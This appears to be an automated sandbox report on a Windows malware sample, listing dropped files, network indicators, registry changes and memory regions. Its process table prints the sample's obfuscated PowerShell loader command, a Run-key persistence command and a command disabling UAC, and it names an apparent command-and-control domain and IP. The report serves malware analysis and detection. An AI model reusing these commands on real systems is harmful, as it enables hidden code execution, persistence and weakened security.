Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
8BoeFOfNMo.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
initial sample
|
||
C:\Users\user\AppData\Local\Temp\Chalcomenite.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Chalcomenite.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\nsv8C98.tmp\BgImage.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\nsv8C98.tmp\UserInfo.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\nsv8C98.tmp\nsExec.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage user DataBase, version 0x620, checksum 0x9b02f762, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
C:\ProgramData\ios\logs.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5hglr25s.zhl.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dwplqiwm.22q.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\dyremedicin\Fejlstrmmen\Gtede\gldssaneringssagen.ind
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\dyremedicin\Fejlstrmmen\Gtede\holger\mellemhandlen.lov
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\dyremedicin\Fejlstrmmen\Gtede\holger\nonconcentric.cit
|
OpenPGP Public Key
|
dropped
|
||
C:\Users\user\AppData\Local\dyremedicin\Fejlstrmmen\Gtede\holger\penalisables.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\dyremedicin\Fejlstrmmen\Gtede\holger\procenttals.min
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\dyremedicin\Fejlstrmmen\Hairbrained.Adv
|
ASCII text, with very long lines (53804), with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\dyremedicin\Fejlstrmmen\Roth.Fri
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\dyremedicin\Fejlstrmmen\epistropheus.has
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\dyremedicin\Fejlstrmmen\feriegodtgrelsen.che
|
data
|
dropped
|
||
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
There are 13 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\8BoeFOfNMo.exe
|
"C:\Users\user\Desktop\8BoeFOfNMo.exe"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"powershell.exe" -windowstyle minimized "$Hovedgrdes=Get-Content 'C:\Users\user\AppData\Local\dyremedicin\Fejlstrmmen\Hairbrained.Adv';$Nrlst=$Hovedgrdes.SubString(3639,3);.$Nrlst($Hovedgrdes)"
|
||
C:\Users\user\AppData\Local\Temp\Chalcomenite.exe
|
"C:\Users\user\AppData\Local\Temp\Chalcomenite.exe"
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ
/d "%Polychotomy% -windowstyle minimized $Preexposure=(Get-ItemProperty -Path 'HKCU:\Exundance\').Veterinren;%Polychotomy%
($Preexposure)"
|
||
C:\Windows\SysWOW64\reg.exe
|
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Polychotomy% -windowstyle
minimized $Preexposure=(Get-ItemProperty -Path 'HKCU:\Exundance\').Veterinren;%Polychotomy% ($Preexposure)"
|
||
C:\Windows\SysWOW64\cmd.exe
|
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD
/d 0 /f
|
||
C:\Windows\SysWOW64\reg.exe
|
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD
/d 0 /f
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
There are 1 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
Zjjnrg.line.pm
|
|||
https://www.google.com
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
http://nsis.sf.net/NSIS_Error
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
https://aka.ms/pscore6lB
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://drive.google.com/
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://drive.usercontent.google.com/
|
unknown
|
||
https://apis.google.com
|
unknown
|
||
http://nsis.sf.net/NSIS_ErrorError
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://drive.google.com/d
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
There are 8 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
jnrg.line.pm
|
194.59.30.244
|
||
drive.google.com
|
142.250.185.238
|
||
drive.usercontent.google.com
|
216.58.206.33
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
194.59.30.244
|
jnrg.line.pm
|
Germany
|
||
216.58.206.33
|
drive.usercontent.google.com
|
United States
|
||
142.250.185.238
|
drive.google.com
|
United States
|
||
127.0.0.1
|
unknown
|
unknown
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
|
EnableLUA
|
||
HKEY_CURRENT_USER\Exundance
|
Veterinren
|
||
HKEY_CURRENT_USER\Environment
|
Polychotomy
|
||
HKEY_CURRENT_USER\SOFTWARE\-4JAT38
|
exepath
|
||
HKEY_CURRENT_USER\SOFTWARE\-4JAT38
|
licence
|
||
HKEY_CURRENT_USER\SOFTWARE\-4JAT38
|
time
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Startup key
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
6C3B000
|
heap
|
page read and write
|
||
B72B000
|
direct allocation
|
page execute and read and write
|
||
5AC9000
|
trusted library allocation
|
page read and write
|
||
88D0000
|
heap
|
page read and write
|
||
4AA1000
|
trusted library allocation
|
page read and write
|
||
2CA1C306000
|
heap
|
page read and write
|
||
701000
|
heap
|
page read and write
|
||
A32B000
|
direct allocation
|
page execute and read and write
|
||
DDB3CFE000
|
stack
|
page read and write
|
||
22EF0000
|
heap
|
page read and write
|
||
DDB4C7E000
|
unkown
|
page readonly
|
||
2CA1C110000
|
trusted library allocation
|
page read and write
|
||
DDB2D7E000
|
unkown
|
page readonly
|
||
2CA1C2F6000
|
heap
|
page read and write
|
||
2CA16C91000
|
heap
|
page read and write
|
||
6E8E3000
|
unkown
|
page read and write
|
||
DDB3B7E000
|
unkown
|
page readonly
|
||
40A000
|
unkown
|
page read and write
|
||
6E8E2000
|
unkown
|
page readonly
|
||
2CA1C460000
|
trusted library allocation
|
page read and write
|
||
2CA16C96000
|
heap
|
page read and write
|
||
9D000
|
stack
|
page read and write
|
||
2CA1C2E7000
|
heap
|
page read and write
|
||
235D000
|
stack
|
page read and write
|
||
727D000
|
heap
|
page read and write
|
||
DDB3BFE000
|
stack
|
page read and write
|
||
2C40000
|
heap
|
page read and write
|
||
2CA17502000
|
heap
|
page read and write
|
||
7430000
|
trusted library allocation
|
page read and write
|
||
2CA173A1000
|
trusted library allocation
|
page read and write
|
||
23BF000
|
stack
|
page read and write
|
||
DDB4BFE000
|
stack
|
page read and write
|
||
A70000
|
heap
|
page read and write
|
||
724C000
|
heap
|
page read and write
|
||
2CA16C13000
|
heap
|
page read and write
|
||
DDB317E000
|
stack
|
page read and write
|
||
5E0B000
|
remote allocation
|
page execute and read and write
|
||
DDB307E000
|
unkown
|
page readonly
|
||
2CA16D02000
|
heap
|
page read and write
|
||
3590000
|
heap
|
page read and write
|
||
8472000
|
heap
|
page read and write
|
||
299D000
|
stack
|
page read and write
|
||
2C87000
|
heap
|
page read and write
|
||
42C000
|
unkown
|
page read and write
|
||
813E000
|
stack
|
page read and write
|
||
6C66000
|
heap
|
page read and write
|
||
2CA16C74000
|
heap
|
page read and write
|
||
535000
|
heap
|
page read and write
|
||
2CA1C200000
|
heap
|
page read and write
|
||
359B000
|
heap
|
page read and write
|
||
AD2B000
|
direct allocation
|
page execute and read and write
|
||
6CAE000
|
heap
|
page read and write
|
||
2CA0000
|
trusted library section
|
page read and write
|
||
75C0000
|
trusted library allocation
|
page read and write
|
||
6CA0000
|
direct allocation
|
page read and write
|
||
DDB3F7E000
|
unkown
|
page readonly
|
||
180B000
|
remote allocation
|
page execute and read and write
|
||
6B9F000
|
stack
|
page read and write
|
||
2CA1C260000
|
trusted library allocation
|
page read and write
|
||
2E4E000
|
stack
|
page read and write
|
||
2CA1C30A000
|
heap
|
page read and write
|
||
71A0000
|
heap
|
page read and write
|
||
360B000
|
remote allocation
|
page execute and read and write
|
||
2CA17D40000
|
trusted library section
|
page readonly
|
||
DDB377C000
|
stack
|
page read and write
|
||
43F000
|
unkown
|
page readonly
|
||
2B40000
|
heap
|
page read and write
|
||
CB2B000
|
direct allocation
|
page execute and read and write
|
||
6C5E000
|
heap
|
page read and write
|
||
6C8E000
|
heap
|
page read and write
|
||
DDB2CFE000
|
stack
|
page read and write
|
||
43F000
|
unkown
|
page readonly
|
||
43D000
|
unkown
|
page read and write
|
||
2CA17C20000
|
trusted library allocation
|
page read and write
|
||
470000
|
heap
|
page read and write
|
||
6C65000
|
heap
|
page read and write
|
||
3570000
|
heap
|
page read and write
|
||
8840000
|
direct allocation
|
page read and write
|
||
6F6000
|
heap
|
page read and write
|
||
303D000
|
stack
|
page read and write
|
||
2B80000
|
direct allocation
|
page read and write
|
||
6D30000
|
direct allocation
|
page read and write
|
||
22B40000
|
direct allocation
|
page read and write
|
||
2357D000
|
stack
|
page read and write
|
||
2CA1C450000
|
trusted library allocation
|
page read and write
|
||
2CA1C1F0000
|
trusted library allocation
|
page read and write
|
||
8FE7000
|
trusted library allocation
|
page read and write
|
||
27C8000
|
stack
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
8DF0000
|
direct allocation
|
page execute and read and write
|
||
80FE000
|
stack
|
page read and write
|
||
8890000
|
direct allocation
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
DDB327E000
|
unkown
|
page readonly
|
||
DDB457C000
|
stack
|
page read and write
|
||
DDB3C7E000
|
unkown
|
page readonly
|
||
321E000
|
stack
|
page read and write
|
||
6CB0000
|
direct allocation
|
page read and write
|
||
16D0000
|
remote allocation
|
page execute and read and write
|
||
6CA4000
|
heap
|
page read and write
|
||
2C80000
|
heap
|
page read and write
|
||
2CA17402000
|
heap
|
page read and write
|
||
71FC000
|
heap
|
page read and write
|
||
5C4D000
|
trusted library allocation
|
page read and write
|
||
845F000
|
heap
|
page read and write
|
||
2CA1C100000
|
trusted library allocation
|
page read and write
|
||
2CA16BA0000
|
trusted library section
|
page read and write
|
||
2CA16D00000
|
heap
|
page read and write
|
||
A50000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
2CA1C22C000
|
heap
|
page read and write
|
||
6F60000
|
heap
|
page read and write
|
||
2CF5000
|
trusted library allocation
|
page execute and read and write
|
||
232FC000
|
stack
|
page read and write
|
||
22CBF000
|
stack
|
page read and write
|
||
32F8000
|
heap
|
page read and write
|
||
6C6C000
|
heap
|
page read and write
|
||
6C6C000
|
heap
|
page read and write
|
||
8680000
|
trusted library allocation
|
page read and write
|
||
DDB397B000
|
stack
|
page read and write
|
||
DDB387E000
|
unkown
|
page readonly
|
||
430000
|
unkown
|
page read and write
|
||
DDB437B000
|
stack
|
page read and write
|
||
2BF0000
|
direct allocation
|
page read and write
|
||
264E000
|
heap
|
page read and write
|
||
711E000
|
stack
|
page read and write
|
||
2CA1C110000
|
trusted library allocation
|
page read and write
|
||
D52B000
|
direct allocation
|
page execute and read and write
|
||
4FE000
|
stack
|
page read and write
|
||
3190000
|
heap
|
page read and write
|
||
DDB2F77000
|
stack
|
page read and write
|
||
843A000
|
heap
|
page read and write
|
||
7670000
|
trusted library allocation
|
page read and write
|
||
2A50000
|
heap
|
page read and write
|
||
C12B000
|
direct allocation
|
page execute and read and write
|
||
7630000
|
trusted library allocation
|
page read and write
|
||
29DD000
|
stack
|
page read and write
|
||
22E0E000
|
stack
|
page read and write
|
||
2CA1C264000
|
heap
|
page read and write
|
||
8310000
|
trusted library allocation
|
page read and write
|
||
2F4B000
|
stack
|
page read and write
|
||
8870000
|
direct allocation
|
page read and write
|
||
7279000
|
heap
|
page read and write
|
||
98000
|
stack
|
page read and write
|
||
5C34000
|
trusted library allocation
|
page read and write
|
||
224BD000
|
stack
|
page read and write
|
||
2CA17513000
|
heap
|
page read and write
|
||
22B70000
|
direct allocation
|
page read and write
|
||
22F3D000
|
stack
|
page read and write
|
||
355E000
|
stack
|
page read and write
|
||
65E000
|
stack
|
page read and write
|
||
2DB7000
|
heap
|
page read and write
|
||
2CA1C1E0000
|
trusted library allocation
|
page read and write
|
||
DDB2E7E000
|
unkown
|
page readonly
|
||
75F0000
|
trusted library allocation
|
page read and write
|
||
2CA16C7E000
|
heap
|
page read and write
|
||
8057000
|
stack
|
page read and write
|
||
2CA17500000
|
heap
|
page read and write
|
||
220B000
|
remote allocation
|
page execute and read and write
|
||
2C60000
|
heap
|
page read and write
|
||
19A000
|
stack
|
page read and write
|
||
6F20000
|
heap
|
page read and write
|
||
8488000
|
heap
|
page read and write
|
||
2F30000
|
trusted library allocation
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
8630000
|
trusted library allocation
|
page execute and read and write
|
||
19E000
|
stack
|
page read and write
|
||
2353F000
|
stack
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
2BB0000
|
direct allocation
|
page read and write
|
||
2CA16B90000
|
trusted library allocation
|
page read and write
|
||
DDB347E000
|
unkown
|
page readonly
|
||
2662000
|
heap
|
page read and write
|
||
72A7000
|
heap
|
page read and write
|
||
2317F000
|
stack
|
page read and write
|
||
223BD000
|
stack
|
page read and write
|
||
7610000
|
trusted library allocation
|
page read and write
|
||
7600000
|
trusted library allocation
|
page read and write
|
||
2CC4000
|
trusted library allocation
|
page read and write
|
||
2CA1C4B0000
|
remote allocation
|
page read and write
|
||
DDB3A7E000
|
unkown
|
page readonly
|
||
23A0000
|
heap
|
page read and write
|
||
DDB337C000
|
stack
|
page read and write
|
||
7296000
|
heap
|
page read and write
|
||
8430000
|
heap
|
page read and write
|
||
2CA1C154000
|
trusted library allocation
|
page read and write
|
||
2CA16C79000
|
heap
|
page read and write
|
||
228DE000
|
stack
|
page read and write
|
||
74CE000
|
stack
|
page read and write
|
||
6BDE000
|
stack
|
page read and write
|
||
530000
|
heap
|
page read and write
|
||
43F000
|
unkown
|
page readonly
|
||
2CA16C00000
|
heap
|
page read and write
|
||
87F0000
|
direct allocation
|
page read and write
|
||
2CA1C313000
|
heap
|
page read and write
|
||
B10000
|
heap
|
page read and write
|
||
22B60000
|
direct allocation
|
page read and write
|
||
DDB2DFF000
|
stack
|
page read and write
|
||
2CA1C244000
|
heap
|
page read and write
|
||
DDB367E000
|
unkown
|
page readonly
|
||
DDB3DFE000
|
stack
|
page read and write
|
||
2F9E000
|
stack
|
page read and write
|
||
2CA16D29000
|
heap
|
page read and write
|
||
72DE000
|
heap
|
page read and write
|
||
2BA0000
|
direct allocation
|
page read and write
|
||
6C1F000
|
stack
|
page read and write
|
||
2CA1C302000
|
heap
|
page read and write
|
||
22EDF000
|
stack
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
2CF0000
|
trusted library allocation
|
page read and write
|
||
8453000
|
heap
|
page read and write
|
||
2CCD000
|
trusted library allocation
|
page execute and read and write
|
||
2D10000
|
trusted library allocation
|
page read and write
|
||
3400000
|
heap
|
page read and write
|
||
2CA1C2E2000
|
heap
|
page read and write
|
||
7420000
|
trusted library allocation
|
page read and write
|
||
225D000
|
stack
|
page read and write
|
||
8800000
|
direct allocation
|
page read and write
|
||
6C8E000
|
heap
|
page read and write
|
||
2CA1C25D000
|
heap
|
page read and write
|
||
225FF000
|
stack
|
page read and write
|
||
2CA180A0000
|
trusted library allocation
|
page read and write
|
||
2CA1C0F0000
|
trusted library allocation
|
page read and write
|
||
DDB3EFE000
|
stack
|
page read and write
|
||
71B7000
|
trusted library allocation
|
page read and write
|
||
7680000
|
trusted library allocation
|
page execute and read and write
|
||
8AF000
|
stack
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
71EF000
|
heap
|
page read and write
|
||
2303C000
|
stack
|
page read and write
|
||
71E0000
|
heap
|
page read and write
|
||
2CA16C41000
|
heap
|
page read and write
|
||
8486000
|
heap
|
page read and write
|
||
7480000
|
heap
|
page execute and read and write
|
||
2EAE000
|
stack
|
page read and write
|
||
2CA1C2D2000
|
heap
|
page read and write
|
||
325E000
|
stack
|
page read and write
|
||
75D0000
|
trusted library allocation
|
page read and write
|
||
2DED000
|
stack
|
page read and write
|
||
2640000
|
heap
|
page read and write
|
||
4A0B000
|
remote allocation
|
page execute and read and write
|
||
DDB41FE000
|
stack
|
page read and write
|
||
720C000
|
heap
|
page read and write
|
||
8640000
|
trusted library allocation
|
page read and write
|
||
DDB3E7E000
|
unkown
|
page readonly
|
||
3580000
|
heap
|
page read and write
|
||
400B000
|
remote allocation
|
page execute and read and write
|
||
8810000
|
direct allocation
|
page read and write
|
||
2343D000
|
stack
|
page read and write
|
||
2CA1C257000
|
heap
|
page read and write
|
||
22D0E000
|
stack
|
page read and write
|
||
2CC3000
|
trusted library allocation
|
page execute and read and write
|
||
71C7000
|
heap
|
page read and write
|
||
72A4000
|
heap
|
page read and write
|
||
2CA1C1E0000
|
trusted library allocation
|
page read and write
|
||
33D0000
|
heap
|
page read and write
|
||
2CC0000
|
trusted library allocation
|
page read and write
|
||
84B7000
|
heap
|
page read and write
|
||
325D000
|
stack
|
page read and write
|
||
7470000
|
trusted library allocation
|
page read and write
|
||
DDB467E000
|
unkown
|
page readonly
|
||
401000
|
unkown
|
page execute read
|
||
31DE000
|
stack
|
page read and write
|
||
2EB0000
|
heap
|
page readonly
|
||
4FDB000
|
trusted library allocation
|
page read and write
|
||
2CA17D50000
|
trusted library section
|
page readonly
|
||
2CA17415000
|
heap
|
page read and write
|
||
2410000
|
heap
|
page read and write
|
||
4BE000
|
stack
|
page read and write
|
||
6BD7000
|
heap
|
page read and write
|
||
84A6000
|
heap
|
page read and write
|
||
2CA17A40000
|
trusted library allocation
|
page read and write
|
||
6E8000
|
heap
|
page read and write
|
||
229DF000
|
stack
|
page read and write
|
||
2CA1C300000
|
heap
|
page read and write
|
||
758D000
|
stack
|
page read and write
|
||
5B09000
|
trusted library allocation
|
page read and write
|
||
2E8F000
|
stack
|
page read and write
|
||
2DC0000
|
heap
|
page read and write
|
||
351E000
|
unkown
|
page read and write
|
||
233FF000
|
stack
|
page read and write
|
||
DDB3FFE000
|
stack
|
page read and write
|
||
33C0000
|
heap
|
page read and write
|
||
2CA1751A000
|
heap
|
page read and write
|
||
8880000
|
direct allocation
|
page read and write
|
||
6ADE000
|
stack
|
page read and write
|
||
7410000
|
trusted library allocation
|
page read and write
|
||
2CA1C150000
|
trusted library allocation
|
page read and write
|
||
71B0000
|
direct allocation
|
page read and write
|
||
2CA16B50000
|
heap
|
page read and write
|
||
2CA16CA9000
|
heap
|
page read and write
|
||
8185000
|
trusted library allocation
|
page read and write
|
||
2DA0000
|
heap
|
page read and write
|
||
2D38000
|
heap
|
page read and write
|
||
231BB000
|
stack
|
page read and write
|
||
6B8000
|
heap
|
page read and write
|
||
329F000
|
stack
|
page read and write
|
||
2F50000
|
heap
|
page read and write
|
||
DDB3AFE000
|
stack
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
2CA1C21F000
|
heap
|
page read and write
|
||
2CA17D20000
|
trusted library section
|
page readonly
|
||
2CA1C2D4000
|
heap
|
page read and write
|
||
2CEA000
|
trusted library allocation
|
page execute and read and write
|
||
2B46000
|
heap
|
page read and write
|
||
6E8E1000
|
unkown
|
page execute read
|
||
835C000
|
stack
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
71B0000
|
trusted library allocation
|
page read and write
|
||
6C69000
|
heap
|
page read and write
|
||
42A000
|
unkown
|
page read and write
|
||
2CA1C111000
|
trusted library allocation
|
page read and write
|
||
DDB40FE000
|
stack
|
page read and write
|
||
75A0000
|
trusted library allocation
|
page execute and read and write
|
||
23FC000
|
stack
|
page read and write
|
||
6D40000
|
heap
|
page read and write
|
||
3090000
|
heap
|
page read and write
|
||
2F1C000
|
stack
|
page read and write
|
||
6B0000
|
heap
|
page read and write
|
||
6D20000
|
direct allocation
|
page read and write
|
||
2B50000
|
direct allocation
|
page read and write
|
||
2CD9000
|
trusted library allocation
|
page read and write
|
||
540B000
|
remote allocation
|
page execute and read and write
|
||
2CA1C293000
|
heap
|
page read and write
|
||
2CA1751A000
|
heap
|
page read and write
|
||
DDB417E000
|
unkown
|
page readonly
|
||
2B20000
|
heap
|
page read and write
|
||
2D9F000
|
stack
|
page read and write
|
||
6BFE000
|
heap
|
page read and write
|
||
6C95000
|
heap
|
page execute and read and write
|
||
8080000
|
heap
|
page read and write
|
||
DDB427E000
|
unkown
|
page readonly
|
||
2BE0000
|
direct allocation
|
page read and write
|
||
2CB0000
|
trusted library allocation
|
page read and write
|
||
2BD0000
|
direct allocation
|
page read and write
|
||
2CA16C7C000
|
heap
|
page read and write
|
||
8830000
|
direct allocation
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
6BB0000
|
heap
|
page read and write
|
||
2CA17701000
|
trusted library allocation
|
page read and write
|
||
2CA1C251000
|
heap
|
page read and write
|
||
2FB6000
|
heap
|
page read and write
|
||
22B50000
|
direct allocation
|
page read and write
|
||
6B1F000
|
stack
|
page read and write
|
||
8820000
|
direct allocation
|
page read and write
|
||
75E0000
|
trusted library allocation
|
page read and write
|
||
B15000
|
heap
|
page read and write
|
||
2CA16C8F000
|
heap
|
page read and write
|
||
2CA17400000
|
heap
|
page read and write
|
||
5C47000
|
trusted library allocation
|
page read and write
|
||
2CA1C140000
|
trusted library allocation
|
page read and write
|
||
2C90000
|
trusted library section
|
page read and write
|
||
70DE000
|
stack
|
page read and write
|
||
706000
|
heap
|
page read and write
|
||
2FB0000
|
heap
|
page read and write
|
||
2CA1C440000
|
trusted library allocation
|
page read and write
|
||
88A0000
|
direct allocation
|
page read and write
|
||
992B000
|
direct allocation
|
page execute and read and write
|
||
6E8E4000
|
unkown
|
page readonly
|
||
A60000
|
heap
|
page read and write
|
||
6CA8000
|
heap
|
page read and write
|
||
DDB29AB000
|
stack
|
page read and write
|
||
8850000
|
direct allocation
|
page read and write
|
||
23F0000
|
heap
|
page read and write
|
||
2FA8000
|
heap
|
page read and write
|
||
6FC000
|
heap
|
page read and write
|
||
2B60000
|
direct allocation
|
page read and write
|
||
285F000
|
stack
|
page read and write
|
||
6C8E000
|
heap
|
page read and write
|
||
264B000
|
heap
|
page read and write
|
||
6C6C000
|
heap
|
page read and write
|
||
8450000
|
heap
|
page read and write
|
||
81D0000
|
trusted library allocation
|
page read and write
|
||
72DA000
|
heap
|
page read and write
|
||
DDB447E000
|
unkown
|
page readonly
|
||
7650000
|
trusted library allocation
|
page read and write
|
||
2CA1C270000
|
trusted library allocation
|
page read and write
|
||
2B70000
|
direct allocation
|
page read and write
|
||
2CA1C130000
|
trusted library allocation
|
page read and write
|
||
680B000
|
remote allocation
|
page execute and read and write
|
||
3170000
|
heap
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
2CA173E0000
|
trusted library allocation
|
page read and write
|
||
87E0000
|
direct allocation
|
page read and write
|
||
839C000
|
stack
|
page read and write
|
||
2CA16D13000
|
heap
|
page read and write
|
||
22E60000
|
remote allocation
|
page read and write
|
||
2CA1C16E000
|
trusted library allocation
|
page read and write
|
||
2CA1D000000
|
heap
|
page read and write
|
||
500000
|
heap
|
page read and write
|
||
6C69000
|
heap
|
page read and write
|
||
2CA1C140000
|
trusted library allocation
|
page read and write
|
||
81E0000
|
trusted library allocation
|
page read and write
|
||
6C56000
|
heap
|
page read and write
|
||
660000
|
heap
|
page read and write
|
||
6CA8000
|
heap
|
page read and write
|
||
2CE0000
|
trusted library allocation
|
page read and write
|
||
9AF000
|
stack
|
page read and write
|
||
5AA1000
|
trusted library allocation
|
page read and write
|
||
6CA7000
|
heap
|
page read and write
|
||
7640000
|
trusted library allocation
|
page read and write
|
||
2CA1C302000
|
heap
|
page read and write
|
||
DDB407E000
|
unkown
|
page readonly
|
||
81C0000
|
trusted library allocation
|
page read and write
|
||
2665000
|
heap
|
page read and write
|
||
2D20000
|
heap
|
page execute and read and write
|
||
8860000
|
direct allocation
|
page read and write
|
||
2E00000
|
heap
|
page read and write
|
||
6C90000
|
heap
|
page execute and read and write
|
||
2CD0000
|
trusted library allocation
|
page read and write
|
||
754E000
|
stack
|
page read and write
|
||
3890000
|
heap
|
page read and write
|
||
2CA16B60000
|
heap
|
page read and write
|
||
2CA17D00000
|
trusted library section
|
page readonly
|
||
2E6E000
|
stack
|
page read and write
|
||
2A40000
|
heap
|
page read and write
|
||
6CA8000
|
heap
|
page read and write
|
||
2CA1755A000
|
heap
|
page read and write
|
||
22350000
|
heap
|
page read and write
|
||
2CA1C2F4000
|
heap
|
page read and write
|
||
6CA8000
|
heap
|
page read and write
|
||
35B5000
|
heap
|
page read and write
|
||
7620000
|
trusted library allocation
|
page read and write
|
||
750E000
|
stack
|
page read and write
|
||
6C8E000
|
heap
|
page read and write
|
||
2CA1C4B0000
|
remote allocation
|
page read and write
|
||
76CB000
|
stack
|
page read and write
|
||
7EEF0000
|
trusted library allocation
|
page execute and read and write
|
||
400000
|
unkown
|
page readonly
|
||
6E8E0000
|
unkown
|
page readonly
|
||
6BD0000
|
heap
|
page read and write
|
||
6E4000
|
heap
|
page read and write
|
||
2CA17D30000
|
trusted library section
|
page readonly
|
||
224FE000
|
stack
|
page read and write
|
||
232BE000
|
stack
|
page read and write
|
||
2BC0000
|
direct allocation
|
page read and write
|
||
2370000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
7400000
|
trusted library allocation
|
page read and write
|
||
4BF6000
|
trusted library allocation
|
page read and write
|
||
2A60000
|
heap
|
page read and write
|
||
8090000
|
heap
|
page read and write
|
||
6B60000
|
heap
|
page read and write
|
||
DDB487E000
|
unkown
|
page readonly
|
||
8060000
|
trusted library allocation
|
page read and write
|
||
DF2B000
|
direct allocation
|
page execute and read and write
|
||
8650000
|
trusted library allocation
|
page read and write
|
||
729C000
|
heap
|
page read and write
|
||
88B0000
|
direct allocation
|
page read and write
|
||
84A0000
|
heap
|
page read and write
|
||
6C6C000
|
heap
|
page read and write
|
||
2F20000
|
trusted library allocation
|
page execute and read and write
|
||
6D45000
|
heap
|
page read and write
|
||
2CA1C2EB000
|
heap
|
page read and write
|
||
22E9E000
|
stack
|
page read and write
|
||
2C0B000
|
remote allocation
|
page execute and read and write
|
||
75B0000
|
trusted library allocation
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
8670000
|
trusted library allocation
|
page execute and read and write
|
||
2C00000
|
direct allocation
|
page read and write
|
||
278C000
|
stack
|
page read and write
|
||
81B0000
|
trusted library allocation
|
page read and write
|
||
2CA16C2B000
|
heap
|
page read and write
|
||
2CA173F0000
|
trusted library allocation
|
page read and write
|
||
2CA17D10000
|
trusted library section
|
page readonly
|
||
7238000
|
heap
|
page read and write
|
||
7660000
|
trusted library allocation
|
page read and write
|
||
2EC8000
|
trusted library allocation
|
page read and write
|
||
2CA16B30000
|
heap
|
page read and write
|
||
9EE000
|
stack
|
page read and write
|
||
22E60000
|
remote allocation
|
page read and write
|
||
8F2B000
|
direct allocation
|
page execute and read and write
|
||
22E60000
|
remote allocation
|
page read and write
|
||
DDB477D000
|
stack
|
page read and write
|
||
2D30000
|
heap
|
page read and write
|
||
72F2000
|
heap
|
